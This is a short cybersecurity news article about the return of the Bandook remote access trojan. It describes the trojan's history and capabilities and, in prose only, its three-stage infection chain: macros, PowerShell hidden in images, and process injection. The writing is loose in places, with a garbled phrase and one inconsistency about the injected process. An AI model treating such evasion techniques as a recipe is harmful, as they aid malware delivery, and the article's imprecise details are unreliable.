The Bandook malware family, which was thought to be extinct, is back and may be part of a larger operation intended to sell offensive hacking tools to governments and cybercriminal groups to attack them.
Several recent research papers have been released by Check Point Research, which indicate that Bandook is regaining popularity across a wide range of targeted sectors and locations despite being a 13-year-old bank, Trojan.
It has been observed that dozens of variants of the malware have been used in attacks in the United States, Singapore, Cyprus, Chile, Italy, Turkey, Switzerland, Indonesia and Germany over the past year in attacks against organizations.
In 2007, Bandook malware was discovered as a remote access trojan that has been active for several years.
It has been reported that Bandook malware has evolved into a new variant that injects its payload into msinfo32.
Exe to distribute the malware and allow remote attackers to take control of the system if it is infected.
Originally developed as a commercial RAT written in both Delphi and C++, Bandook RAT eventually evolved into several variants over the years, and this malware became available for download from the internet.
Formerly a commercial RAT, Bandook was originally developed by a Lebanese named Prince Ali as a commercial RAT. It is common for remote access trojans to be used to remotely manage infected computers, without the consent of the users.
In addition to keylogging, audio capture and video capture, screenshot capture and uploading to a remote server, and running various command shell programs, this malware is capable of performing a variety of malicious activities.
Thieves can use hijacked accounts to spread malware, sending malicious files and links to all contacts in the account.
A Trojan horse is often used to spread infections, such as ransomware and crypto miners since they can modify system settings as well as download additional malware.
Trojan horses are also often used to spread viruses and malware.
During the last few years, the malware had all but disappeared from the threat landscape, but it appears it has begun to resurface again.
An infected computer will receive a malware chain consisting of three stages.
The first stage is to download two files into the local user folder using a lure document, which contains malicious VBA macro code encoded with an encryption algorithm.
First, there is a PowerShell script file that gets dropped into the user's folder, and the second file is a JPG file which contains a base64 encoded PowerShell script that is saved in the JPG file.
Its second stage will be the decoding and executing of the base64 encoded PowerShell scripts stored in the JPG file, which will render a zip file containing four files from cloud services, then download the zip file containing the files in the zip file.
Among the four files, three of them are PNG files with hidden RC4 functions encapsulated in the RGB values of the pixels that belong to the RGB file.
As a result of the existence of these files, an executable that acts as a Bandook loader will be constructed.
After the creation of the Internet Explorer process, the bandook loader will inject the malicious payload into the process and then proceed to the final stage of the process.
This Cyber News was published on www.cysecurity.news. Publication date: Mon, 25 Dec 2023 11:43:06 +0000